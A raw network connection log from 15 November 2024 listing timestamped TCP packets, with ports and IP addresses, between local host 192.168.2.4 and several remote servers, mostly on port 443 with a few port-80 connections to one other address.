Nov 15, 2024 14:09:15.787894964 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.787941933 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.787950039 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.788073063 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.788126945 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.788136959 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.794316053 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.794410944 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.794476986 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.794492006 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.795242071 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.795249939 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.801732063 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.803215027 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.803226948 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.804991961 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.805042028 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.805051088 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.812076092 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.812299013 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.812309027 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.813294888 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.813479900 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.813543081 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.813556910 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.813910961 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.813999891 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.814080954 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.814089060 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.814141989 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.814194918 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.814666986 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.814726114 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.814742088 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.818257093 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.818311930 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.818320990 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.819701910 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.819787025 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.819849968 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.819863081 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.819921017 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.824668884 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.824722052 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.824734926 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.825248003 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.828435898 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.828531981 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.828609943 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.828624964 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.830205917 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.830857038 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.830909967 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.830921888 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.831839085 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.834985971 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.835046053 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.835057020 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.837995052 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.838228941 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.838299990 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.838313103 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.838335991 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.838347912 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.838361025 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.838414907 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.841365099 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.843226910 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.843277931 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.843287945 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.844682932 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.844777107 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.844850063 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.844862938 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.847202063 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.847837925 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.849474907 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.849553108 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.849562883 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.850919008 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.850986958 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.850997925 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.854113102 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.854196072 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.854274035 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.854285955 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.855252981 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.855882883 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.856498957 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.856513023 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.857240915 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.860204935 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.860265017 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.860275984 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.862081051 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.863255978 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.863269091 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.863382101 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.863445997 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.863456964 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.866575956 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.866636038 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.866647005 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.868468046 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.868519068 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.868527889 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.869163990 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.869226933 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.869239092 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.872245073 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.872325897 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.872337103 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.874435902 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.874629021 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.874645948 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.875262976 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.875324011 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.875334978 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.875493050 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.875549078 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.875560045 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.880634069 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.880691051 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.880705118 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.887464046 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.887537956 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.887552023 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.904499054 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.904552937 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.904571056 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.904586077 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.904624939 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.904633999 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.905630112 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.905678034 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.905685902 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.911468983 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.911525011 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.911534071 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.916887999 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.916937113 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.916945934 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.919867039 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.919878960 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.920108080 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.920253992 CET	443	49737	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.920322895 CET	49737	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.922535896 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.923017025 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.923026085 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.928204060 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.931253910 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.931272984 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.933722019 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.933779955 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.933789015 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.939344883 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.942747116 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.942805052 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.942823887 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.943240881 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.943248987 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.946176052 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.946227074 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.946234941 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.949558973 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.951241970 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.951248884 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.952883005 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.953094006 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.953102112 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.956156015 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.956207037 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.956216097 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.959309101 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.959394932 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.959403038 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.962541103 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.962596893 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.962605953 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.962804079 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:15.962857008 CET	443	49738	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:15.962904930 CET	49738	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:16.363951921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:16.364006996 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:17.451925039 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:17.451957941 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:17.452020884 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:17.452222109 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:17.452239037 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:17.750685930 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:17.750776052 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:17.750873089 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:17.751077890 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:17.751106024 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.336169004 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:18.338615894 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:18.338633060 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:18.340199947 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:18.340259075 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:18.341476917 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:18.341574907 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:18.383625031 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:18.383637905 CET	443	49745	142.250.185.68	192.168.2.4
Nov 15, 2024 14:09:18.430471897 CET	49745	443	192.168.2.4	142.250.185.68
Nov 15, 2024 14:09:18.609939098 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.610171080 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.610213995 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.611881971 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.612041950 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.613064051 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.613157988 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.613266945 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.613282919 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.664444923 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.755712032 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:18.755763054 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:18.755831003 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:18.756038904 CET	49749	443	192.168.2.4	142.250.186.110
Nov 15, 2024 14:09:18.756047010 CET	443	49749	142.250.186.110	192.168.2.4
Nov 15, 2024 14:09:18.812402010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:18.812609911 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:18.817343950 CET	80	49730	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:18.817439079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:18.817507029 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:18.817615032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:18.822390079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:18.856807947 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.856879950 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.856937885 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.856942892 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.856960058 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.857012033 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.857146978 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.857439995 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.857489109 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.857506037 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.865262985 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.865369081 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.865384102 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.914449930 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.914474010 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.961425066 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.974925041 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.975123882 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.975207090 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.975233078 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.976680040 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.976756096 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.976773977 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.981410980 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.981475115 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.981482029 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.989989996 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.990077972 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.990098000 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.998912096 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:18.999093056 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:18.999110937 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.007461071 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.007529974 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.007549047 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.016426086 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.016503096 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.016525984 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.024873018 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.025044918 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.025063038 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.033250093 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.033324003 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.033341885 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.087374926 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.087393045 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.091773987 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.091851950 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.091892958 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.091908932 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.091923952 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.091988087 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.092012882 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.092077017 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.092092991 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.093748093 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.093823910 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.093832016 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.096182108 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.096256971 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.096262932 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.099203110 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.099272966 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.099280119 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.105880022 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.105943918 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.105961084 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.112519979 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.112627983 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.112700939 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.112710953 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.113280058 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.120193005 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.124317884 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.124398947 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.124422073 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.130222082 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.130319118 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.130335093 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.130367041 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.130431890 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.136415005 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.142323017 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.142398119 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.142416954 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.148935080 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.149007082 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.149024963 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.154424906 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.154541016 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.154588938 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.154611111 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.154771090 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.160254955 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.166371107 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.166426897 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.166439056 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.166465044 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.166527987 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.172420025 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.178379059 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.178447008 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.178464890 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.205091953 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.205187082 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.205209017 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208548069 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208604097 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208615065 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.208640099 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208693981 CET	443	49747	142.250.185.78	192.168.2.4
Nov 15, 2024 14:09:19.208709002 CET	49747	443	192.168.2.4	142.250.185.78
Nov 15, 2024 14:09:19.208726883 CET	443	49747	142.250.185.78	192.168.2.4
